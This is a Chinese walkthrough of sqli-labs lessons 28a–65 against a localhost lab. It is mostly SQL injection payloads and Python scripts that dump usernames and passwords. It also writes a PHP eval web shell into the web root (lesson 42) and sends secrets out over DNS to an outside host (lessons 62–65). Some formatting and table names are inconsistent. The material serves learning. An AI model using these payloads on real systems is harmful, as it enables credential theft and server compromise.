payload = "0') union select 1,2,group_concat(username,'<>',password,'<br>') from users where ('1".replace(' ', '%a0')

html = get("http://localhost/sqllab/Less-28a/?id=" + payload).text
print(html)
print('Dumb' in html)
print(payload)
```

## Day33-Less29
### 分析

这题应该用 login.php 来玩
index.php 没啥用啊

这题第一次接触的时候没审计代码怕是过不去
首先能猜出后面只允许数字过,剩下的就都不知道了

审计代码发现,先过一个 java_implimentation,把第一个叫 id 的参数拿出来,然后,把这个参数扔到 whitelist 的白名单过滤
但是,$id=$_GET['id']; 取得的却是最后一次出现的 id,也就是说,对于第二个出现的 id,毫无过滤。所以可以这样
?id=1&id=1'
就可以看到报错了
'1'' LIMIT 0,1
接下来该干啥干啥
select XX,XX,XX from XXX where id='' LIMIT 0,1

select XX,XX,XX from XXX where id='
0' union select 1,2,group_concat(username,'<>',password,'
') from users where '1
' LIMIT 0,1

?id=1&id=0' union select 1,2,group_concat(username,'<>',password,'
') from users where '1


### 代码
```python
from requests import *
import re

# Less-29: the value is appended to the URL unencoded, so the embedded "&id="
# turns into a second id parameter (parameter pollution). Per the analysis
# above, the whitelist check sees the first id while $_GET keeps the last.
payload = "1&id=0' union select 1,2,group_concat(username,'<>',password,'<br>') from users where '1'--+".replace(' ', '%a0')

html = get("http://localhost/sqllab/Less-29/login.php?id=" + payload).text
print(html)

Day34-Less30

分析

与 29 相比,单引号改为双引号,其他一样
?id=1&id=0" union select 1,2,group_concat(username,'<>',password,'<br>') from users where "1

Day35-Less31

分析

与 30 相比,加了括号,其他一样
?id=1&id=0") union select 1,2,group_concat(username,'<>',password,'<br>') from users where ("1

Day36-Less32

分析

0' union select 1,2,group_concat(username,CHAR(61),password) from users--+

利用宽字节注入。
' -> %d6'

代码

from requests import *
import re

# Less-32: every single quote is prefixed with %d6 (the wide-byte trick the
# analysis above relies on); nothing else in the payload is touched.
payload = "0' union select 1,2,group_concat(username,CHAR(61),password) from users--+".replace("'", "%d6'")

html = get("http://localhost/sqllab/Less-32/?id=" + payload).text
print(html)
print('Dumb' in html)
print(payload)
```

## Day37-Less33
### 分析

和 32 一样


## Day38-Less34
### 分析

如果报编码错误,那就运行一下这个:
alter table users convert to character set gbk;

0' union select 1,group_concat(username,CHAR(61),password) from users#


### 代码
```python
from requests import *
import re

# Less-34: POST login form. The wide-byte prefix is a raw 0xd6 byte in the
# string literal here, rather than the %d6 escape used in the GET variants.
form = dict(
    uname='Dhakkan',
    passwd="0\xd6' union select 1,group_concat(username,CHAR(61),password) from users#",
)

html = post("http://localhost/sqllab/Less-34/", data=form).text
print(html)
print('Dumb' in html)

Day39-Less35

分析

数值型

0 union select 1,2,group_concat(username,CHAR(61),password) from users

Day40-Less36

分析

依然可用宽字节
0%d6\' union select 1,2,group_concat(username,CHAR(61),password) from users--+

Day41-Less37

分析

和 34 一毛一样
0\xd6' union select 1,group_concat(username,CHAR(61),password) from users#

代码

from requests import *
import re

# Less-37: same form and payload as Less-34, only the lesson URL differs.
form = dict(
    uname='Dhakkan',
    passwd="0\xd6' union select 1,group_concat(username,CHAR(61),password) from users#",
)

html = post("http://localhost/sqllab/Less-37/", data=form).text
print(html)
print('Dumb' in html)

Day42-Less38

分析

Stacked injections:堆叠注入
就是多条语句,利用分号隔开
这题没有更好的场景,显得有点鸡肋
0' union select 1,2,group_concat(username,CHAR(61),password) from users--+
注入一句话倒是不错

Day43-Less39

分析

同 38
0 union select 1,2,group_concat(username,CHAR(61),password) from users--+

Day44-Less40

分析

同 38
0') union select 1,2,group_concat(username,CHAR(61),password) from users--+

Day45-Less41

分析

同 38
0 union select 1,2,group_concat(username,CHAR(61),password) from users--+

Day46-Less42

分析

报错在登录的时候可以爆出

pdata = {
'login_user': '1',
'login_password' : "' union select 1,2,3 from users where extractvalue(1,concat('*',(select group_concat(username,'<>',password,'<br>') from users)))#",
}
不过返回的时候 XPATH syntax error 有截断,遍历一下就 OK 了:
ERROR 1105 (HY000): XPATH syntax error: 'Dumb<>Dumb<br>,Angelina<>I-kill-'
或者利用 concat 一个一个搞也行

这种情况下,不需要知道用户名
还可以这样
1';SELECT 0x3c3f706870206576616c28245f504f53545b78696d6f5d293b203f3e into outfile 'D://wamp//www//web.php'#




代码

from requests import *
import re

# Less-42: stacked-query payload for the login form. Everything after the ';'
# is a second statement that asks MySQL to write a file under the web root
# (the hex literal decodes to a short PHP script).
# Server-side this only works when the DB account holds the FILE privilege
# and secure_file_priv does not restrict the target directory; denying FILE
# and setting secure_file_priv are the mitigations, and a DB user writing
# into the web root is a high-signal event to alert on.
pdata = {
'login_user': '1',
'login_password' : "1';SELECT 0x3c3f706870206576616c28245f504f53545b78696d6f5d293b203f3e into outfile 'D://wamp//www//web.php'#",
}

html = post("http://localhost/sqllab/Less-42/login.php", data = pdata).text
print html
# 'Dumb' presumably reflects only the first (login) statement; it says nothing
# about whether the file write in the second statement succeeded.
print 'Dumb' in html

Day47-Less43

分析

同 42
加了括号
') union select 1,2,3 from users where extractvalue(1,concat('*',(select group_concat(username,'<>',password,'<br>') from users)))#

Day48-Less44

分析

基于时间
pdata = {
'login_user': '1',
'login_password' : "1' and (select sleep(2) from (select 1,2)x where length(database())=8)#",
}


不过这题可以重置所有用户的密码:
pdata = {
'login_user': '1',
'login_password' : "1' or '1' limit 1,1#",
}

来个更刺激的
' union select 1,group_concat(username,'=',password,'<br>'),3 from users#



select id,username,password from XXXX where username='1' and password='' union select 1,group_concat(username,'=',password,'<br>'),3 from users#' limit 0,1

代码

from requests import *
import re

# Less-44: union through the password field of the login form; the
# reconstructed query is shown in the analysis above.
form = dict(
    login_user='1',
    login_password="' union select 1,group_concat(username,'=',password,'<br>'),3 from users#",
)

html = post("http://localhost/sqllab/Less-44/login.php", data=form).text
print(html)
print('Dumb' in html)

Day49-Less45

分析

和 44 一样,加了括号而已
') union select 1,group_concat(username,'=',password,'<br>'),3 from users#

代码

from requests import *
import re

# Less-45: the Less-44 payload with the extra closing parenthesis.
form = dict(
    login_user='1',
    login_password="') union select 1,group_concat(username,'=',password,'<br>'),3 from users#",
)

html = post("http://localhost/sqllab/Less-45/login.php", data=form).text
print(html)
print('Dumb' in html)

Day50-Less46

分析

sort 注入
1. 利用 rand(true) 和 rand(false) 的结果不一样
?sort=rand(length(database())=7)
?sort=rand(length(database())=8)

2. 报错注入
?sort=(select count(*) from information_schema.columns group by concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand()*2)))
1 and (extractvalue(rand(),concat(0x3a,version())),1)

3. 延时注入
1 and (select sleep(1) from (select 1,2)x where length(database())=8)

4.其他
into outfile 啥的,都行

Day51-Less47

分析

与 46 相比,除了无法使用 rand 以外,其他都一样

Day52-Less48

分析

数字型
错误被屏蔽,延时注入即可

Day53-Less49

分析

与 48 一样,只不过是单引号型
1' and (select sleep(1) from (select 1,2)x where length(database())=8)--+

Day54-Less50

分析

堆叠注入
但是可以用前面几题过
0 or (select (extractvalue(rand(),concat(0x3a,version())),1))--+
?sort=1 and (select sleep(1) from (select 1,2)x where length(database())=8)--+

Day55-Less51

分析

和 50 一样,加了单引号

1' and (select sleep(1) from (select 1,2)x where length(database())=7)--+
0' or (select (extractvalue(rand(),concat(0x3a,version())),1))--+


Day56-Less52

分析

盲注
?sort=1 and (select sleep(1) from (select 1,2)x where length(database())=8)--+

Day57-Less53

分析

和 52 一样,加了引号而已

?sort=1' and (select sleep(1) from (select 1,2)x where length(database())=8)--+

Day58-Less54

分析

开始有意思了,限制查询 10 次
第一次
?id=1 正常
?id=1' 不正常,没报错
?id=1' or 1--+ 正常
由于已知 databasename 是 challenges
那就先搞表名
?id=0' union select 1,2,group_concat(table_name,'<>',column_name,'<br>') from information_schema.COLUMNS where TABLE_SCHEMA='challenges'--+
返回为

Your Login name:2
Your Password:35fb3t92ky<>id
,35fb3t92ky<>sessid
,35fb3t92ky<>secret_LKVY
,35fb3t92ky<>tryy

可以看到,表名为 at4bwg0te1,有 4 列:
id sessid secret_LKVY tryy

?id=0' union select 1,2,group_concat(id,'<>',sessid,'<>',secret_LKVY,'<>',tryy,'<br>') from challenges.35fb3t92ky--+

代码

from requests import *
from re import *

def GetTableName():
    """Return every (table_name, column_name) pair of the 'challenges' schema.

    A single union query makes group_concat() emit one '=>table<>column'
    entry per line; the pairs are then pulled back out of the page with
    findall(). Returns an empty list when the marker is absent from the
    response.
    """
    query = "0' union select 1,2,group_concat('=>',table_name,'<>',column_name,'\n') from information_schema.COLUMNS where TABLE_SCHEMA='challenges'#"
    page = get('http://localhost/sqllab/Less-54/index.php', params={'id': query}).text
    return findall(r'=>([a-z0-9]+)<>(.+)\n', page)

def GetColumnName(q, tablename):
    """Return the first data row of challenges.<tablename> as a 4-tuple.

    Despite its name this does not list columns: `q` is an already-built
    column expression (e.g. "id,'<>',sessid,'<>',...") whose values are
    joined by '<>' with one row per line, and the first match with exactly
    four fields is returned. Raises IndexError when nothing matches.
    """
    query = "0' union select 1,2,group_concat('=>',%s,'\n') from challenges.%s#" % (q, tablename)
    page = get('http://localhost/sqllab/Less-54/index.php', params={'id': query}).text
    rows = findall(r'=>(.+)<>(.+)<>(.+)<>(.+)\n', page)
    return rows[0]


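# Driver: list the schema, print what was found, then fetch the first row of
# the (single) table and report its third field, which per the column order
# shown in the analysis above is the secret_* column.
table = GetTableName()
# Assumes at least one pair was recovered; table[0] raises IndexError otherwise.
tableName = table[0][0]
columns = ' [-]' + '\n [-]'.join(i[1] for i in table)
print '[+]TableName:', tableName
# Label fixed: the original read "CotablenamelumnsNames", a garbled edit.
print '[+]ColumnsNames:\n', columns

q = ",'<>',".join(i[1] for i in table)
data = GetColumnName(q, tableName)

print '[!]Password is:', data[2]
```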

## Day59-Less55
### 分析

和 54 一样,只不过加了括号以及是数字型
0) union select 1,2,group_concat(table_name,'<>',column_name,'
') from information_schema.COLUMNS where TABLE_SCHEMA='challenges' or (0

?id=0) union select 1,2,group_concat(id,'<>',sessid,'<>',secret_25UU,'<>',tryy,'
') from challenges.e2du3yn5gq where (1


## Day60-Less56
### 分析

和前 2 题一样的套路
?id=0') union select 1,2,group_concat(table_name,'<>',column_name,'
') from information_schema.COLUMNS where TABLE_SCHEMA='challenges'--+

?id=0') union select 1,2,group_concat(id,'<>',sessid,'<>',secret_ZV9U,'<>',tryy,'
') from challenges.7j9km4qsh7--+


## Day61-Less57
### 分析

和前 3 题一样的套路
?id=0" union select 1,2,group_concat(table_name,'<>',column_name,'
') from information_schema.COLUMNS where TABLE_SCHEMA='challenges'--+

?id=0" union select 1,2,group_concat(id,'<>',sessid,'<>',secret_ZV9U,'<>',tryy,'
') from challenges.7j9km4qsh7--+


## Day62-Less58
### 分析

?id=0' or (extractvalue(rand(),(select group_concat('->',table_name,'
') from information_schema.COLUMNS where TABLE_SCHEMA='challenges')))--+

?id=0' or (extractvalue(rand(),(select group_concat(column_name,'
') from information_schema.COLUMNS where TABLE_SCHEMA='challenges')))--+

?id=0' or (extractvalue(rand(),(select group_concat('<>',secret_2EOZ) from challenges.ae85jljdmd)))--+


## Day63-Less59
### 分析

和 58 一样,不过是数字型
?id=0 or (extractvalue(rand(),(select group_concat('->',table_name,'
') from information_schema.COLUMNS where TABLE_SCHEMA='challenges')))--+

?id=0 or (extractvalue(rand(),(select group_concat(column_name,'
') from information_schema.COLUMNS where TABLE_SCHEMA='challenges')))--+

?id=0 or (extractvalue(rand(),(select group_concat('<>',secret_6GBR) from challenges.pebeduo6fx)))--+


## Day64-Less60
### 分析

和 58 一样,不过是双引号加括号
?id=0") or (extractvalue(rand(),(select group_concat('->',table_name,'
') from information_schema.COLUMNS where TABLE_SCHEMA='challenges')))--+

?id=0") or (extractvalue(rand(),(select group_concat(column_name,'
') from information_schema.COLUMNS where TABLE_SCHEMA='challenges')))--+

?id=0") or (extractvalue(rand(),(select group_concat('<>',secret_QIN6) from challenges.ortaw2xc59)))--+


## Day65-Less61
### 分析

和 58 一样,不过是单引号加双括号
?id=0')) or (extractvalue(rand(),(select group_concat('->',table_name,'
') from information_schema.COLUMNS where TABLE_SCHEMA='challenges')))--+

?id=0')) or (extractvalue(rand(),(select group_concat(column_name,'
') from information_schema.COLUMNS where TABLE_SCHEMA='challenges')))--+

?id=0')) or (extractvalue(rand(),(select group_concat('<>',secret_VSZ6) from challenges.est6bn4mqy)))--+


## Day66-Less62
### 分析

盲注
交给 py 去做吧

不过次数应该会大于 130
找到了一个更好的办法,DNS 解析
SELECT LOAD_FILE(CONCAT('\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.xxxxxx.ceye.io\abc'))

所以可以构造
http://localhost/sqllab/Less-62/?id=1') and if((SELECT LOAD_FILE(CONCAT('\\',(SELECT TABLE_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA='challenges' limit 0,1),'.xxxxxx.ceye.io\abc'))),1,1)--+

得到
q1bcv0fqh9.xxxxxx.ceye.io

继续,得到表名
http://localhost/sqllab/Less-62/?id=1') and if(1,(SELECT LOAD_FILE(CONCAT('\\',(SELECT column_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA='challenges' and column_NAME like 'sec%' limit 0,1),'.xxxxxx.ceye.io\abc'))),1)--+

继续,得到 key
http://localhost/sqllab/Less-62/?id=1') and if(1,(SELECT LOAD_FILE(CONCAT('\\',(SELECT secret_T82V FROM challenges.q1bcv0fqh9 limit 0,1),'.xxxxxx.ceye.io\abc'))),1)--+

emm
有点开挂的赶脚..


### 代码
```python
from requests import get
from string import ascii_letters, digits

def GuessTBNameLenth(n, name):
    """Return the length of the n-th (0-based) table name in schema `name`.

    Position i is probed with ascii(SUBSTR(table_name, i, 1)): the page shows
    the 'Your Login name' row while that character exists, so the first
    position without the row is one past the end. One request per position;
    every request bumps the module-level guessTime counter.
    """
    global guessTime
    print '[+]Guessing TableName Length'
    i = 1
    while 1:
        guessTime += 1
        r = get("http://localhost/sqllab/Less-62/?id=') or ascii(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.tables where TABLE_SCHEMA ='%s' limit %d,1),%d,1)) --+" %(name,n,i))
        html = r.text
        if 'Your Login name' not in html:
            print ' [-]The TableName Lenth is', i-1
            return i-1
        i+=1

def GuessTBsNames(num, DBName):
    """Recover the name of the first table in `DBName`, one character at a time.

    `num` is accepted but never used: only table index 0 (`no = 0`) is read.
    For each position every candidate in ascii_letters+digits is tested with
    SUBSTR(...)='c'; the first candidate that brings back the 'Your Login name'
    row is appended and the position is done. A position where no candidate
    matches is silently skipped, so the result can be shorter than `length`.
    NOTE(review): '=' is a collation-dependent comparison; under a
    case-insensitive collation the lowercase candidate (tried first) also
    matches an uppercase character -- confirm against the lab's collation.
    Returns the recovered name.
    """
    global guessTime
    no = 0
    name = ''
    length = GuessTBNameLenth(no, DBName)
    print ' [-]Guessing Table Name'
    for i in xrange(length):
        for n in ascii_letters+digits:
            guessTime += 1
            r = get("http://localhost/sqllab/Less-62/?id=') or SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='%s' limit %d,1),%d,1)='%s' --+" %(DBName,no,i+1,n))
            html = r.text
            if 'Your Login name' in html:
                name += n
                print ' [-]', name
                break

    print ' [-]Tables Names is:', name
    return name

def GuessCLMNum(tname,dname):
    """Return the number of columns of `dname`.`tname`.

    Counts upward from 0, asking on each request whether i equals
    count(COLUMN_NAME) for the table; the first i that brings back the
    'Your Login name' row is the answer. Not called from the driver code
    at the bottom of this script.
    """
    global guessTime
    print '[+]Guessing Colunms num'
    i = 0
    while 1:
        guessTime += 1
        r = get("http://localhost/sqllab/Less-62/?id=') or %d=(SELECT count(COLUMN_NAME) FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s') --+" %(i,tname,dname))
        html = r.text
        if 'Your Login name' in html:
            print ' [-]The Colunm num is', i
            return i
        i+=1

def GuessCLMLen(cnum, tname, dname):
    """Return the length of the cnum-th (0-based) column name of `dname`.`tname`.

    Same position-by-position probe as GuessTBNameLenth, but it starts at
    position 7 because GuessCLMName hard-codes the 'secret_' prefix; a name
    shorter than 7 characters would therefore be reported as length 6.
    """
    global guessTime
    i = 7
    while 1:
        guessTime += 1
        r = get("http://localhost/sqllab/Less-62/?id=') or ascii(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s' limit %d,1),%d,1)) --+" %(tname,dname,cnum,i))
        html = r.text
        if 'Your Login name' not in html:
            print ' [-]The Colunm Lenth is', i-1
            return i-1
        i+=1

def GuessCLMName(DBName, tname):
    """Recover the name of column index 2 of `tname` and then dump its values.

    Only the third column (`cnum = 2`, the row INFORMATION_SCHEMA returns at
    offset 2 with no ORDER BY) is handled; it is assumed to be the secret_*
    column, and the 'secret_' prefix is taken as given so guessing starts at
    position 7. Once the name is complete GuessDatas() is invoked, which
    prints its own findings; its return value is stored in `data` but never
    used, and this function returns None.
    """
    global guessTime

    print '[+]Guessing Colunms for', tname
    cnum = 2 #No.3
    length = GuessCLMLen(cnum, tname, DBName)
    name = 'secret_'
    for i in xrange(7,length):
        for n in ascii_letters+digits:
            guessTime += 1
            r = get("http://localhost/sqllab/Less-62/?id=') or SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s' limit %d,1),%d,1)='%s' --+" %(tname,DBName,cnum,i+1,n))
            html = r.text
            if 'Your Login name' in html:
                name += n
                print ' [-]', name
                break

    data = GuessDatas(DBName, tname, name)
    print ' [-]The Colunms are',name

def GuessDatasnum(dname, tname, cname):
    """Return the row count of `dname`.`tname` (counted over column `cname`).

    Counts upward from 0 and stops at the first i for which
    i=(SELECT count(cname) ...) brings back the 'Your Login name' row.
    """
    global guessTime
    i = 0
    while 1:
        guessTime += 1
        r = get("http://localhost/sqllab/Less-62/?id=') or %d=(SELECT count(%s) FROM %s.%s) --+" %(i,cname,dname,tname))
        html = r.text
        if 'Your Login name' in html:
            print ' [-]The Datas num is', i
            return i
        i+=1

def GuessDataLen(dname, tname, cname, n):
    """Return the length of the value in column `cname` of row n (0-based).

    Same position-by-position ascii(SUBSTR(...)) probe as GuessTBNameLenth,
    applied to a single cell of `dname`.`tname`.
    """
    global guessTime
    print ' [-]Guessing data length'
    i = 1
    while 1:
        guessTime += 1
        r = get("http://localhost/sqllab/Less-62/?id=') or ascii(SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1)) --+" %(cname, dname, tname, n, i))
        html = r.text
        if 'Your Login name' not in html:
            print ' [-]The Data Lenth is', i-1
            return i-1
        i+=1

def GuessDatas(dname, tname, cname):
    """Return a list with the value of column `cname` for every row of the table.

    For each row the value length is measured first, then each position is
    matched against ascii_letters+digits exactly as in GuessTBsNames. The
    request is retried until it does not raise; the bare `except:` also
    catches KeyboardInterrupt and there is no pause between retries despite
    the 'Relaxing...' message. A position with no matching candidate is
    skipped, so a returned value can be shorter than the measured length.
    """
    global guessTime
    datanum = GuessDatasnum(dname, tname, cname)
    Data = []
    for no in range(datanum):
        length = GuessDataLen(dname, tname, cname, no)
        print ' [-]Guessing data'
        name = ''
        for i in xrange(length):
            for n in ascii_letters+digits:
                while 1:
                    try:
                        guessTime += 1
                        r = get("http://localhost/sqllab/Less-62/?id=') or SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1)='%s' --+" %(cname, dname, tname, no,i+1,n))
                        break
                    except:
                        print 'Relaxing...'
                html = r.text
                if 'Your Login name' in html:
                    name += n
                    print ' [-]', name
                    break
        Data.append(name)
    print ' [-]All Datas of %s is:' %cname, Data
    return Data

# Driver. guessTime is the shared request counter every helper increments;
# it is printed at the end so the total number of requests is visible.
guessTime = 0
DBName = 'challenges'
# Passed to GuessTBsNames as `num`, which ignores it and reads table index 0.
TBsNum = 1
TBsNames = GuessTBsNames(TBsNum, DBName)
print
# Prints the column name and the recovered values itself; returns None.
GuessCLMName(DBName, TBsNames)
print '[!]All Done!'
print guessTime
```

## Day67-Less63
### 分析

和 62 一样,要么盲注,要么 DNS

?id=1' and if((SELECT LOAD_FILE(CONCAT('\\',(SELECT TABLE_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA='challenges' limit 0,1),'.xxxxxx.ceye.io\abc'))),1,1)--+

得到 ud7yymnibx

?id=1' and if(1,(SELECT LOAD_FILE(CONCAT('\\',(SELECT column_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA='challenges' and column_NAME like 'sec%' limit 0,1),'.xxxxxx.ceye.io\abc'))),1)--+

得到 secret_5YDC

?id=1' and if(1,(SELECT LOAD_FILE(CONCAT('\\',(SELECT secret_5YDC FROM challenges.ud7yymnibx limit 0,1),'.xxxxxx.ceye.io\abc'))),1)--+


## Day68-Less64
### 分析

和 62 一样,要么盲注,要么 DNS

?id=1)) and if((SELECT LOAD_FILE(CONCAT('\\',(SELECT TABLE_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA='challenges' limit 0,1),'.xxxxxx.ceye.io\abc'))),1,1)--+

得到 ex06wyovlw

?id=1)) and if(1,(SELECT LOAD_FILE(CONCAT('\\',(SELECT column_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA='challenges' and column_NAME like 'sec%' limit 0,1),'.xxxxxx.ceye.io\abc'))),1)--+

得到 secret_G074

?id=1)) and if(1,(SELECT LOAD_FILE(CONCAT('\\',(SELECT secret_G074 FROM challenges.ex06wyovlw limit 0,1),'.xxxxxx.ceye.io\abc'))),1)--+


## Day69-Less65
### 分析

和 62 一样,要么盲注,要么 DNS

?id=1") and if((SELECT LOAD_FILE(CONCAT('\\',(SELECT TABLE_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA='challenges' limit 0,1),'.xxxxxx.ceye.io\abc'))),1,1)--+

得到 gfpke05sif

?id=1") and if(1,(SELECT LOAD_FILE(CONCAT('\\',(SELECT column_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA='challenges' and column_NAME like 'sec%' limit 0,1),'.xxxxxx.ceye.io\abc'))),1)--+

得到 secret_SWQ8

?id=1") and if(1,(SELECT LOAD_FILE(CONCAT('\\',(SELECT secret_SWQ8 FROM challenges.gfpke05sif limit 0,1),'.xxxxxx.ceye.io\abc'))),1)--+
```

心得

sql 注入不仅仅局限于某种姿势,只有触类旁通才能熟练掌握
做这个 lab 的时候要手工注入,或者自己写脚本,不要用 sqlmap 之类的


来呀快活呀

